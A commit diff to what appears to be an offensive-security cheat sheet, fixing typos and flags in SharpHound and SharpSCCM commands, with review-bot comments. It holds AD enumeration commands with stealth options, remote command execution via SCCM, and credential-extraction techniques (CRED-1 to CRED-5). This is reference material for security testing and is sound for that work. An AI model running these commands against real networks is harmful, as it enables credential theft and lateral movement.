SCCM typos + SharpHound new args

pull/6/head
Swissky 2024-03-22 12:41:22 +01:00
parent 1cee3b6738
commit 581fdf4f18
2 changed files with 10 additions and 9 deletions

@ -23,7 +23,8 @@ Use the correct collector:
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile> .\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile>
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100 -d active.htb .\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100 -d active.htb
.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
.\SharpHound.exe -c All,GPOLocalGroup --outputdirectory C:\Windows\Temp --prettyprint --randomfilenames --collectallproperties --throttle 10000 --jitter 23 --outputprefix internalallthething
``` ```
* Use [BloodHoundAD/SharpHound.ps1](https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1) - run the collector on the machine using Powershell * Use [BloodHoundAD/SharpHound.ps1](https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1) - run the collector on the machine using Powershell
```powershell ```powershell
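Review bot: the added `-c All,GPOLocalGroup` line switches to `--prettyprint` and `--randomfilenames` and no longer carries `--nosavecache` or `--encryptzip`, but nothing in the block says which SharpHound release the new spellings belong to or why those two flags went away. A short note naming the collector version would help readers on other releases, and `--outputprefix internalallthething` would read better with a placeholder such as `<Prefix>`, matching `<UserName>` and `<PathToFile>` on the lines above.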

@ -10,7 +10,7 @@
* Using **SharpSCCM** * Using **SharpSCCM**
```ps1 ```ps1
.\SharpSCCM.exe get device --server <SERVER8NAME> --site-code <SITE_CODE> .\SharpSCCM.exe get devices --server <SERVER8NAME> --site-code <SITE_CODE>
.\SharpSCCM.exe <server> <sitecode> exec -d <device_name> -r <relay_server_ip> .\SharpSCCM.exe <server> <sitecode> exec -d <device_name> -r <relay_server_ip>
.\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug .\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug
``` ```
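Review bot: on the changed `get devices` line the placeholder still reads `<SERVER8NAME>`, which looks like a slip for `<SERVER_NAME>` given `<SITE_CODE>` right beside it. Since this commit is a typo pass, fix it on the same line. The next line uses positional `<server> <sitecode>` while this one uses `--server` and `--site-code`; worth making the two consistent while here.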
@ -81,13 +81,13 @@
* [Misconfiguration-Manager - CRED-1](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-1/cred-1_description.md) * [Misconfiguration-Manager - CRED-1](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-1/cred-1_description.md)
Requirements: **Requirements**:
* On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\PxeInstalled` = 1 * On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\PxeInstalled` = 1
* On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\IsPxe` = 1 * On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\IsPxe` = 1
* PXE-enabled distribution point * PXE-enabled distribution point
Exploitation: **Exploitation**:
* [csandker/pxethiefy](https://github.com/csandker/pxethiefy) * [csandker/pxethiefy](https://github.com/csandker/pxethiefy)
```ps1 ```ps1
@ -101,12 +101,12 @@ Exploitation:
* [Misconfiguration-Manager - CRED-2](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md) * [Misconfiguration-Manager - CRED-2](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md)
Requirements: **Requirements**:
* PKI certificates are not required for client authentication * PKI certificates are not required for client authentication
* Domain accounts credential * Domain accounts credential
Exploitation: **Exploitation**:
Create a machine or compromise an existing one, then request policies such as `NAAConfig` Create a machine or compromise an existing one, then request policies such as `NAAConfig`
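Review bot: the CRED-2 requirements list still reads `Domain accounts credential` directly under the newly bolded `**Requirements**:` label. `Domain account credentials` is the likely intent and belongs in this typo pass.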
@ -116,7 +116,7 @@ SharpSCCM get naa
``` ```
### CRED-3 Extract currently deployed credentials stored as DPAPI blobs and decrypt ### CRED-3 Extract currently deployed credentials stored as DPAPI blobs
> Dump currently deployed secrets via WMI. If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials. > Dump currently deployed secrets via WMI. If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.
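Review bot: the new CRED-3 heading drops `and decrypt`, yet the quoted summary directly below it still promises `plaintext domain credentials`, so the heading now says less than the section delivers. Either keep the decryption wording or state in the commit message why it was removed.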
@ -158,7 +158,7 @@ From a remote machine.
``` ```
### CRED-4 Extract legacy credentials stored as DPAPI blobs and decrypt ### CRED-4 Extract legacy credentials stored as DPAPI blobs
* [Misconfiguration-Manager - CRED-4](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-4/cred-4_description.md) * [Misconfiguration-Manager - CRED-4](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-4/cred-4_description.md)
@ -187,7 +187,7 @@ From a remote machine.
### CRED-5 Extract and decrypt the SC_UserAccount table from the site database ### CRED-5 Extract the SC_UserAccount table from the site database
* [Misconfiguration-Manager - CRED-5](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-5/cred-5_description.md) * [Misconfiguration-Manager - CRED-5](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-5/cred-5_description.md)
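Review bot: renaming the CRED-3, CRED-4 and CRED-5 headings changes any anchors generated from the heading text, so existing links to the old `... and decrypt` headings may stop resolving. Check the repository for links to those anchors before merging, or keep the old heading text.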